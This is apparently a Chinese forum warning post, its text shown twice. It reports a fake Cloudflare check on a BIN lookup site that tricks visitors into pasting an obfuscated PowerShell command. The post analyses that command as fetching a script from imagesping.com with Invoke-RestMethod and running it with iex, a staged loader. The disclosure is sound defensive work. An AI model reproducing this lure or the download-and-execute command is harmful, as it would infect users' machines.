近期在访问 BIN 查询站点 https://bincheck.io/zh 时,页面出现异常“Cloudflare 验证”,并提示执行以下操作:
Win + R
Ctrl + V
Enter
该流程并非正常验证码行为,而是诱导用户在本机执行 PowerShell 命令。
命令分析结果:
使用大小写混淆
通过 FunctionName + Substring 拼接真实命令
实际执行逻辑为:
Invoke-RestMethod imagesping.com
→ iex 执行返回内容
即从远程服务器下载脚本并直接执行。
进一步测试发现:
直接浏览器访问 imagesping.com 仅返回简单 JS 代码:
{if(nav.vendor==undefined){done(" not available ");};
说明该域名存在访问环境判断机制,仅在特定条件下返回真实 payload。这属于典型的 staged loader 投递行为。
lQLPJxZdHgvsuNnNA2nNBUCwmvHyWslIto8JdjgtesdMAQ_1344_873.png
(36.98 KB, 下载次数: 2)
2026-2-25 09:47 上传
Win + R
Ctrl + V
Enter
该流程并非正常验证码行为,而是诱导用户在本机执行 PowerShell 命令。
命令分析结果:
使用大小写混淆
通过 FunctionName + Substring 拼接真实命令
实际执行逻辑为:
Invoke-RestMethod imagesping.com
→ iex 执行返回内容
即从远程服务器下载脚本并直接执行。
进一步测试发现:
直接浏览器访问 imagesping.com 仅返回简单 JS 代码:
{if(nav.vendor==undefined){done(" not available ");};
说明该域名存在访问环境判断机制,仅在特定条件下返回真实 payload。这属于典型的 staged loader 投递行为。
lQLPJxZdHgvsuNnNA2nNBUCwmvHyWslIto8JdjgtesdMAQ_1344_873.png
(36.98 KB, 下载次数: 2)
2026-2-25 09:47 上传